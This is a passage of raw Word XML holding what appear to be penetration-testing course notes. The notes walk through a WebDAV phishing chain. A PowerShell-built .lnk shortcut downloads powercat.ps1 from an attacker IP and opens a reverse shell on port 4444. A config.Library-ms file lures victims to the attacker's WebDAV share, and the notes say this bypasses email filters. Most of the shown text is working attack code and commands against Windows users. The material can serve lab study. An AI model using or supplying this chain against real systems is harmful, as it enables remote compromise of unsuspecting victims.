        </w:rPr>
        <w:t xml:space="preserve">Then via a terminal, get it into our kali and specifically into our webdav directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-smbserver</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026DE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure to put this file (and all the other files) inside of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/kali/webdav</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is how to make a .lnk file using powershell if you don't have access to RDP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$WshShell = New-Object -COMObject WScript.Shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Initialize object</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$Shortcut = $WshShell.CreateShortcut("</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Users\offsec\test2.lnk</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This tells it where to put the shortcut</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We called it test2.lnk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$Shortcut.TargetPath = "powershell.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tells it to run powershell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$Shortcut.Arguments = "-c IEX(New-Object System.Net.WebClient).DownloadString('</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.45.232:8000/powercat.ps1'); powercat -c 192.168.45.232 -p 4444 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-e powershell"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the argument that will passed into powershell.exe to be run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$Shortcut.Save()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This saves the shortcut and it will appear where you put it now</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now export it using impacket-smbserver</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">copy test2.lnk \\192.168.45.232\share\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inside of webdav directory, create a malicious file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">config.Library-ms</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> INSIDE of webdav directory. Make sure to replace </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.45.232 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">with your own IP. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">config.Library-ms</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file is a Windows Library file that tricks the victim into connectiong to the remote WebDAV share hosted by the attacker (you). </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When opened, this file loads content from your Kali box over HTTP, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">allowing you to bypass email filters and attachments restrictions by making</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the victim pull additional malicious files (like the reverse shell .lnk shortcut) from your WebDAV</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> share without directly attaching them in the email.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TLDR: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basically, when they click on this file, a file explorer page will pop up, and they will connect to our WebDAV server we are hosting on port 80, which has the malicious shortcut that sends reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026F0">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026F1">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026F2">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026F3">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;name&gt;@windows.storage.dll,-34582&lt;/name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026F4">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;version&gt;6&lt;/version&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026F5">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;isLibraryPinned&gt;true&lt;/isLibraryPinned&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026F6">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;iconReference&gt;imageres.dll,-1003&lt;/iconReference&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026F7">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;templateInfo&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026F8">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;folderType&gt;{7d49d726-3c21-4f05-99aa-fdc2c9474656}&lt;/folderType&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026F9">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/templateInfo&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026FA">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;searchConnectorDescriptionList&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026FB">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;searchConnectorDescription&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026FC">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;isDefaultSaveLocation&gt;true&lt;/isDefaultSaveLocation&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026FD">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;isSupported&gt;false&lt;/isSupported&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026FE">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;simpleLocation&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026FF">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;url&gt;http://192.168.45.232:80&lt;/url&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002700">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/simpleLocation&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002701">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/searchConnectorDescription&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002702">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/searchConnectorDescriptionList&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002703">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/libraryDescription&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002704">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002705">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT, if you don't host the webdav server on port 80, then change the port on the config.Library-ms file. If you do have it on port 80, then just delete the port 80 on the file. I haven't tested it out if it works with the port 80 on there. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002706">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure to put this file (and all the other files) inside of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/kali/webdav</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002707">
      <w:pPr>
